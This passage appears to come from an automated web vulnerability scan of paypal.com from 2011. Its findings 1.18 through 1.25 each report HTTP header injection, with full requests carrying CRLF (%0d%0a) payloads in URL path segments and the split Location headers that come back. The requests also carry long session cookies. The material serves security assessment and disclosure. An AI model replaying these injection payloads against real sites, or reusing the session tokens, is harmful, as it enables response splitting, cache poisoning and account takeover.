Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:06 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/2bb9c
28403a88997/global.js
Content-Length: 295
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.18. https://www.paypal.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/lib/min/widgets.js

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload acb9f%0d%0a5a0bb7c5739 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /acb9f%0d%0a5a0bb7c5739/js/lib/min/widgets.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:55 GMT
Server: Apache
Location: https://www.paypalobjects.com/acb9f
5a0bb7c5739/js/lib/min/widgets.js
Content-Length: 278
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.19. https://www.paypal.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/lib/min/widgets.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 94aa5%0d%0adf8f29d5b2c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/94aa5%0d%0adf8f29d5b2c/lib/min/widgets.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:58 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/94aa5
df8f29d5b2c/lib/min/widgets.js
Content-Length: 297
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.20. https://www.paypal.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/lib/min/widgets.js

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 64f1d%0d%0aaa26f43f775 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/js/64f1d%0d%0aaa26f43f775/min/widgets.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:02 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/64f1d
aa26f43f775/min/widgets.js
Content-Length: 296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.21. https://www.paypal.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/lib/min/widgets.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 856fd%0d%0a95cd71371c8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/js/lib/856fd%0d%0a95cd71371c8/widgets.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:06 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/856fd
95cd71371c8/widgets.js
Content-Length: 296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.22. https://www.paypal.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b44ec%0d%0a54bab26f24e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b44ec%0d%0a54bab26f24e/js/opinionlab/oo_engine.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:55 GMT
Server: Apache
Location: https://www.paypalobjects.com/b44ec
54bab26f24e/js/opinionlab/oo_engine.js
Content-Length: 283
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.23. https://www.paypal.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 13dde%0d%0ac6860a19283 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/13dde%0d%0ac6860a19283/opinionlab/oo_engine.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:58 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/13dde
c6860a19283/opinionlab/oo_engine.js
Content-Length: 302
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.24. https://www.paypal.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 7910d%0d%0afcad27caa97 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/js/7910d%0d%0afcad27caa97/oo_engine.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:02 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/7910d
fcad27caa97/oo_engine.js
Content-Length: 294
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.25. https://www.paypal.com/WEBSCR-640-20110722-1/js/siteWideSearch.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/siteWideSearch.js

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f9ea8%0d%0ad92e26bb157 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f9ea8%0d%0ad92e26bb157/js/siteWideSearch.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
